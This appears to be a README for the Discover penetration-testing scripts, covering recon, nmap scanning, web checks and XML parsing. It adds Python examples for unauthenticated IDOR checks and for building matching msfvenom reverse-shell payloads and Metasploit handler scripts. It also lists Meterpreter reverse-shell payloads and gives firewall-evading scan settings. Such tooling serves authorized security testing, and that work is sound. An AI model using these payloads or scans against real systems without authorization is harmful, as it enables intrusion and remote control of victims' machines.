
Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit. For use with Kali Linux and the Penetration Testers Framework (PTF).
- Lee Baird @discoverscripts
- Jay “L1ghtn1ng” Townsend @jay_townsend1
- Jason Ashton @ninewires
Download, setup, and usage
- git clone https://github.com/leebaird/discover /opt/discover/
- All scripts must be run from this location.
- cd /opt/discover/
- ./update.sh
RECON
1. Domain
2. Person
3. Parse salesforce
SCANNING
4. Generate target list
5. CIDR
6. List
7. IP, range, or domain
8. Rerun Nmap scripts and MSF aux
WEB
9. Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL
MISC
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
16. Update
17. Exit
RECON
Domain
RECON
1. Passive
2. Active
3. Import names into an existing recon-ng workspace
4. Previous menu
Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ng.
Active uses dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng.
[*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, Hunter, SecurityTrails, and Shodan for maximum results with recon-ng and theHarvester.
API key locations:
recon-ng
keys list (recon-ng 4.x used "show keys")
keys add bing_api <key>
theHarvester
/opt/theHarvester/api-keys.yaml
Person
RECON
First name:
Last name:
- Combines information from multiple websites.
Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search for your target company > select the company name > see all.
Copy the results into a new file.
Enter the location of your list:
- Gathers names and positions into a clean list.
SCANNING
Generate target list
SCANNING
1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu
- Use different tools to create a target list, including Angry IP Scanner, arp-scan, netdiscover and an nmap ping sweep.
CIDR, List, IP, Range, or URL
Type of scan:
1. External
2. Internal
3. Previous menu
- External scan sets the nmap source port to 53 (-g 53, which permissive firewall rules for DNS often let through) and --max-rtt-timeout to 1500ms.
- Internal scan sets the nmap source port to 88 (-g 88, Kerberos) and --max-rtt-timeout to 500ms.
- Source-port selection only applies to raw-packet scans such as SYN and UDP, which require root; a TCP connect scan ignores it.
- Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
- Matching nmap scripts are used for additional enumeration.
- Additional tools: enum4linux, smbclient, and ike-scan.
- Matching Metasploit auxiliary modules are also leveraged.
WEB
Insecure direct object reference
Using Burp, authenticate to a site, map & spider it, then log out.
Target > Site map > select the URL > right click > Copy URLs in this host.
Paste the results into a new file.
Enter the location of your file:
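The page does not spell out what the script does with the file of URLs once you supply it. The check the Burp workflow sets up is an unauthenticated re-request of every URL that was reachable inside the session: anything that still returns its content without a cookie is an insecure direct object reference candidate. The following is an added example of that check, not code from the Discover project; the sample URL file, the hypothetical app.example.com responses, the login path and the password-field marker are all constructed assumptions.

```python
"""Unauthenticated re-request check for URLs copied out of an authenticated Burp session."""
import urllib.error
import urllib.request
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

# Static assets are served without authorization by design and only add noise.
STATIC_SUFFIXES = (".css", ".js", ".png", ".jpg", ".gif", ".svg", ".ico", ".woff", ".woff2")

# A fetcher returns (status, final URL after redirects, first bytes of the body as text).
Fetcher = Callable[[str], Tuple[int, str, str]]


def load_urls(text: str) -> List[str]:
    """Parse the file pasted from Burp: one URL per line, de-duplicated, static assets dropped."""
    seen, urls = set(), []
    for line in text.splitlines():
        url = line.strip()
        if not url or url.startswith("#"):
            continue
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or url in seen:
            continue
        if parts.path.lower().endswith(STATIC_SUFFIXES):
            continue
        seen.add(url)
        urls.append(url)
    return urls


def fetch_unauthenticated(url: str, timeout: int = 10) -> Tuple[int, str, str]:
    """Request a URL with a fresh opener: no cookie jar, so no session from Burp is carried."""
    opener = urllib.request.build_opener()
    req = urllib.request.Request(url, headers={"User-Agent": "idor-recheck"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.geturl(), resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.geturl(), ""
    except urllib.error.URLError:
        return 0, url, ""


def find_candidates(urls: List[str], fetch: Fetcher, login_path: str = "/login") -> List[str]:
    """Return URLs that still answer 200 without a session and do not bounce to the login page."""
    hits = []
    for url in urls:
        status, final_url, body = fetch(url)
        if status != 200:
            continue
        if urlsplit(final_url).path == login_path:
            continue  # redirected to login: the object is protected
        if 'type="password"' in body.lower():
            continue  # login form rendered in place of the object
        hits.append(url)
    return hits


# Constructed sample of what "Copy URLs in this host" might yield for a hypothetical app.
SAMPLE_URL_FILE = """\
https://app.example.com/login
https://app.example.com/account/1234
https://app.example.com/account/1235
https://app.example.com/invoices/9001.pdf
https://app.example.com/static/logo.png
https://app.example.com/account/1234
"""

# Constructed responses standing in for the hypothetical app so the check runs offline.
LOGIN_FORM = '<form><input type="password" name="pw"></form>'
SAMPLE_RESPONSES = {
    "https://app.example.com/login": (200, "https://app.example.com/login", LOGIN_FORM),
    "https://app.example.com/account/1234": (200, "https://app.example.com/login", LOGIN_FORM),
    "https://app.example.com/account/1235": (200, "https://app.example.com/account/1235", "<h1>Account 1235</h1>"),
    "https://app.example.com/invoices/9001.pdf": (200, "https://app.example.com/invoices/9001.pdf", "%PDF-1.4"),
}


def stub_fetch(url: str) -> Tuple[int, str, str]:
    return SAMPLE_RESPONSES.get(url, (404, url, ""))


if __name__ == "__main__":
    for hit in find_candidates(load_urls(SAMPLE_URL_FILE), stub_fetch):
        print("reachable without a session:", hit)
```

Against a live target, pass fetch_unauthenticated instead of stub_fetch and set login_path to the application's real login route. A 200 without a session is a lead, not a finding: confirm the body really is another user's object, since some applications return a generic 200 error page instead of redirecting.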
Open more than one tabs in Firefox
Open multiple tabs in Firefox with:
1. List
2. Directories from robots.txt.
3. Previous menu
- Use a list containing IPs and/or URLs.
- Use wget to pull a site's robots.txt file, then open all of the directories it lists.
Nikto
Run multiple instances of Nikto in parallel.
1. List of IPs.
2. List of IP:port.
3. Previous menu
SSL
Check for SSL certificate issues.
Enter the location of your list:
- Use sslscan and sslyze to check for SSL/TLS certificate and configuration issues.
MISC
Parse XML
Parse XML to CSV.
1. Burp (Base64)
2. Nessus (.nessus)
3. Nexpose (XML 2.0)
4. Nmap
5. Qualys
6. Previous menu
Generate a malicious payload
Malicious Payloads
1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. java/jsp_shell_reverse_tcp (Linux)
4. java/jsp_shell_reverse_tcp (Windows)
5. linux/x64/meterpreter_reverse_https
6. linux/x64/meterpreter_reverse_tcp
7. linux/x64/shell/reverse_tcp
8. osx/x64/meterpreter_reverse_https
9. osx/x64/meterpreter_reverse_tcp
10. php/meterpreter/reverse_tcp
11. python/meterpreter_reverse_https
12. python/meterpreter_reverse_tcp
13. windows/x64/meterpreter_reverse_https
14. windows/x64/meterpreter_reverse_tcp
15. Previous menu
Start a Metasploit listener
Metasploit Listeners
1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. java/jsp_shell_reverse_tcp
4. linux/x64/meterpreter_reverse_https
5. linux/x64/meterpreter_reverse_tcp
6. linux/x64/shell/reverse_tcp
7. osx/x64/meterpreter_reverse_https
8. osx/x64/meterpreter_reverse_tcp
9. php/meterpreter/reverse_tcp
10. python/meterpreter_reverse_https
11. python/meterpreter_reverse_tcp
12. windows/x64/meterpreter_reverse_https
13. windows/x64/meterpreter_reverse_tcp
14. Previous menu
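The payload menu and the listener menu are two halves of one step: the handler only catches a session if its PAYLOAD, LHOST and LPORT match what msfvenom was given, and a staged name (meterpreter/reverse_tcp) will not catch a stageless one (meterpreter_reverse_tcp). The following is an added example, not the Discover project's code, that builds both sides from one set of values; the output-format mapping, the port check and the sample values are this example's assumptions.

```python
"""Build matching msfvenom and exploit/multi/handler invocations from one payload/LHOST/LPORT."""
import shlex
from typing import List

# msfvenom -f value by payload platform; php, python, java, android and cmd payloads ship as raw.
FORMAT_BY_PLATFORM = {"windows": "exe", "linux": "elf", "osx": "macho"}


def output_format(payload: str) -> str:
    return FORMAT_BY_PLATFORM.get(payload.split("/")[0], "raw")


def lport_ok(lport: int) -> bool:
    return 1 <= lport <= 65535


def validate(lhost: str, lport: int) -> None:
    if not lhost or any(ch.isspace() for ch in lhost):
        raise ValueError(f"bad LHOST: {lhost!r}")
    if not lport_ok(lport):
        raise ValueError(f"LPORT out of range: {lport}")


def msfvenom_argv(payload: str, lhost: str, lport: int, outfile: str) -> List[str]:
    """argv for msfvenom; pass to subprocess.run without a shell so no quoting issues arise."""
    validate(lhost, lport)
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", output_format(payload), "-o", outfile]


def handler_rc(payload: str, lhost: str, lport: int) -> str:
    """Resource script for msfconsole -r; the PAYLOAD line is the exact string given to msfvenom."""
    validate(lhost, lport)
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",  # keep listening after the first session arrives
        "exploit -j -z",            # run as a background job and do not auto-interact
    ]) + "\n"


def msfconsole_argv(rc_path: str) -> List[str]:
    return ["msfconsole", "-q", "-r", rc_path]


if __name__ == "__main__":
    # Constructed sample values: a lab listener on 10.0.0.5 and a stageless HTTPS Meterpreter.
    payload, lhost, lport = "windows/x64/meterpreter_reverse_https", "10.0.0.5", 443
    print(shlex.join(msfvenom_argv(payload, lhost, lport, "payload.exe")))
    print(handler_rc(payload, lhost, lport), end="")
    print(shlex.join(msfconsole_argv("handler.rc")))
```

Write handler_rc's output to a file and start it with msfconsole -q -r handler.rc before delivering the payload; for the reverse_https payloads the listener must be reachable on LPORT from the target, and 443 is a convention, not a requirement.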
Update
- Use to update Kali Linux, the Discover scripts, various tools, and the locate database.